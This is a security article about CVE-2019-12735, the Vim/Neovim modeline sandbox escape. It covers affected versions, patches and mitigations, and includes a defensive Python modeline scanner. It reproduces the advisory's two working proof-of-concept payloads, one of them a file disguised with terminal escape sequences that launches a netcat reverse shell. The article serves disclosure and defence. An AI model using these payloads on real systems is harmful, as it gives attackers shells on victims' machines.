credits: www.securityaffairs.co

Code Red! If you are running an older version of Vim or Neovim on Linux, opening a specially crafted text file is enough to get your system compromised.

The widely used Vim editor and its fork, Neovim, were recently found to be vulnerable to arbitrary code execution via a crafted text file. Both editors come pre-installed on several Linux distributions. The vulnerability has been assigned CVE-2019-12735 and was discovered by security researcher Armin Razmjou. The advisory he published last week includes two proof-of-concept exploits to support his claim.

The exploit takes advantage of Vim's handling of 'modelines'. A modeline lets a file set editor options that are specific to that file. When a file is opened, Vim scans its first and last few lines (five by default, controlled by the 'modelines' option) for a modeline and applies the options it finds, for example setting the tab width to 5 spaces.

Proof of Concept:

1. The first PoC file mentioned in the advisory contains the following line:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

After saving this in a text file, say poc1.txt, run the following command:

$ vim poc1.txt

As soon as Vim opens the file, the fold expression from the modeline is evaluated and the output of 'uname -a' appears on the screen, proving that a shell command taken from the file has been executed.

2. A typical real-life scenario can be demonstrated using the following PoC.

Consider a file with the following content (non-printable bytes are shown as C-style \x escapes):

\x1b[?7l\x1bSWelcome to SecPod Technologies.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 1234 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KWelcome to SecPod Technologies."\x16\x1b[D \n

This file hides its modeline behind terminal escape sequences, so that 'cat' prints only "Welcome to SecPod Technologies." ('cat -v' reveals the real content). When the file is opened in Vim, the modeline triggers the embedded commands: a Netcat reverse shell is started in the background (in the PoC it connects to 127.0.0.1 on port 1234; an attacker would substitute a host and port they control and have a listener waiting there), and the file is rewritten as soon as it is opened to conceal the attack. All the attacker has to do is get an unsuspecting user to open the text file in Vim, after which the attacker has a shell on the user's system with that user's privileges.

[Figure: user's screen (L) and the attacker's screen (R)]

A modeline only allows 'set' commands, and expression-valued options set from a modeline (such as 'foldexpr') are evaluated in a sandbox to prevent side effects like shell command execution. However, Armin pointed out that the sandbox can be bypassed with the :source! command (with the bang [!] modifier). :source! reads a file and executes its lines as Normal-mode commands, and those commands run after the sandbox has been left. A modeline can therefore be crafted to source the file itself (the PoCs use % for the current file name), so that the command on the file's first line, ':!uname -a' in the first PoC, runs outside the sandbox.

# vim: set foldexpr=execute('\:source! some_file'):

In the case of Neovim, which prevents execute() from running in the sandbox, assert_fails() can be used instead, as it also takes a {cmd} argument.
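The following scanner applies the modeline rules described above to a file the way Vim does. It is an added example written for this article, not code from the advisory or from the Vim project: it checks only the first and last five lines, parses both modeline forms from ':help modeline' (simplified; version-restricted markers such as vim<800: are not handled), and flags expression options whose value contains source!, execute(, assert_fails( or system(, together with the terminal escape sequences the second PoC uses to hide its modeline from 'cat'. The sample inputs are constructed: POC1 is the first PoC line from the advisory, HIDDEN imitates the second PoC with a harmless :echo in place of the reverse shell, and BENIGN is an ordinary indentation modeline.

```python
"""
Scanner for Vim/Neovim modelines that could abuse the CVE-2019-12735 sandbox
escape. Added example for this article; not code from Armin Razmjou's
advisory or from the Vim project. Re-implements the two modeline forms from
':help modeline' in simplified form (version-restricted markers such as
vim<800: are not handled).
"""
import re

# Vim scans only the first and last 'modelines' lines of a file (default 5).
MODELINES = 5

# Options that take a Vim expression. The modeline sandbox is what keeps these
# from running arbitrary code; 'nomodelineexpr' (patch 8.1.1366) disables them
# in modelines altogether. Long and short names are both listed.
EXPR_OPTIONS = {
    "foldexpr", "fde", "foldtext", "fdt", "includeexpr", "inex",
    "indentexpr", "inde", "formatexpr", "fex", "statusline", "stl",
    "rulerformat", "ruf", "tabline", "tal", "guitablabel", "gtl",
    "titlestring", "iconstring", "charconvert", "ccv", "printexpr",
    "pexpr", "diffexpr", "dex", "patchexpr", "pex",
}

# Value fragments that reach command execution. "source!" (possibly written
# with backslashes, as in the PoCs) runs the file's lines as Normal-mode
# commands after the sandbox has been left, which is the core of the bug.
DANGEROUS = re.compile(
    r"source\\*!|execute\(|assert_fails\(|system\(|nvim_input\(|libcall\(",
    re.IGNORECASE,
)

# Both forms start with a marker at the start of the line or after white space:
#   [text{white}]{vi:|vim:|ex:}[white]{options}                  (first form)
#   [text{white}]{vi:|vim:|Vim:|ex:}[white]set {options}:[text]  (second form)
MARKER = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*")
# Separators are not recognised when escaped with a backslash.
UNESCAPED_COLON = re.compile(r"(?<!\\):")
UNESCAPED_SPACE = re.compile(r"(?<!\\)\s+")
UNESCAPED_COLON_OR_SPACE = re.compile(r"(?<!\\)[:\s]+")


def parse_modeline(line):
    """Return the option strings a modeline sets, or [] if the line has none."""
    m = MARKER.search(line)
    if not m:
        return []
    rest = line[m.end():]
    second = re.match(r"(?:set|se)\s+(.*)", rest)
    if second:
        # Second form: options end at the first unescaped ':'.
        body = UNESCAPED_COLON.split(second.group(1), maxsplit=1)[0]
        return [o for o in UNESCAPED_SPACE.split(body) if o]
    # First form: options are separated by white space or ':'.
    return [o for o in UNESCAPED_COLON_OR_SPACE.split(rest) if o]


def option_name(opt):
    """'fde=...' -> 'fde', 'nofen' -> 'fen', 'ts+=2' -> 'ts'."""
    name = re.split(r"[=:+^!&<-]", opt, maxsplit=1)[0]
    for prefix in ("no", "inv"):
        if name.startswith(prefix) and len(name) > len(prefix):
            return name[len(prefix):]
    return name


def scan_lines(lines, modelines=MODELINES):
    """Emulate Vim's modeline scan over the first and last 'modelines' lines
    and return (line_number, reason) findings; [] means nothing suspicious."""
    n = len(lines)
    candidates = sorted(set(range(min(modelines, n))) |
                        set(range(max(0, n - modelines), n)))
    findings = []
    for i in candidates:
        line = lines[i]
        if "\x1b" in line or "\x16" in line:
            findings.append((i + 1, "terminal escape sequences; may hide the modeline from cat"))
        if line.startswith(":!"):
            findings.append((i + 1, "starts with an Ex shell command that :source! would run"))
        for opt in parse_modeline(line):
            name = option_name(opt)
            if name not in EXPR_OPTIONS:
                continue
            if DANGEROUS.search(opt):
                findings.append((i + 1, f"{name} runs a command outside the sandbox: {opt}"))
            else:
                findings.append((i + 1, f"{name} is an expression option set from a modeline"))
    return findings


def scan_text(text, modelines=MODELINES):
    """Convenience wrapper for a whole file's content."""
    return scan_lines(text.splitlines(), modelines)


# Constructed samples. POC1 is the first PoC line from the advisory; HIDDEN
# mirrors the second PoC's escape-sequence trick with the reverse shell
# replaced by a harmless :echo. BENIGN is an ordinary indentation modeline.
POC1 = ':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="'
HIDDEN = ("\x1b[?7l\x1bSWelcome.\x1b:silent! echo 'payload' | redraw! "
          "\" vim: set fen fdm=expr fde=assert_fails('set\\ fde=x\\ \\|\\ source\\!\\ \\%')"
          " fdl=0: \x16\x1b[1G\x16\x1b[KWelcome.\"\x16\x1b[D")
BENIGN = "# vim: set ts=4 sw=4 et:"

if __name__ == "__main__":
    for label, text in (("poc1", "\n".join(["notes"] * 8 + [POC1])),
                        ("hidden", HIDDEN), ("benign", BENIGN)):
        print(label, scan_text(text) or "clean")
```

The scan window must match the 'modelines' value of the Vim that will open the file (pass a larger value if the user has raised it), and a clean result only means no known pattern was found; it is no substitute for 'set nomodeline'.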

This vulnerability has been assigned a high severity rating.

Affected versions:

Vim: versions before 8.1.1365 (the fix is patch 8.1.1365)
Neovim: versions before 0.3.6

Solution/Mitigation

The upstream source code has been patched (Vim patch 8.1.1365 and Neovim 0.3.6), but updates from the respective Linux vendors are still pending for most distributions. Fedora has already released a patch and hopefully others will soon follow.

As additional measures, the researcher also recommends:

  • Disable modelines in your vimrc with the following commands ('modelines=0' sets the number of lines scanned to zero and 'nomodeline' switches the feature off; either one is sufficient, both together do no harm):

set modelines=0

set nomodeline

  • Use the securemodelines plugin, or disable the 'modelineexpr' option (available since patch 8.1.1366, Vim only) to disallow expressions in modelines.

Use SanerNow to detect and mitigate these vulnerabilities and prioritize your patching.

Article: Flaw in Vim Editor could compromise your system. Publisher: SecPod Technologies.
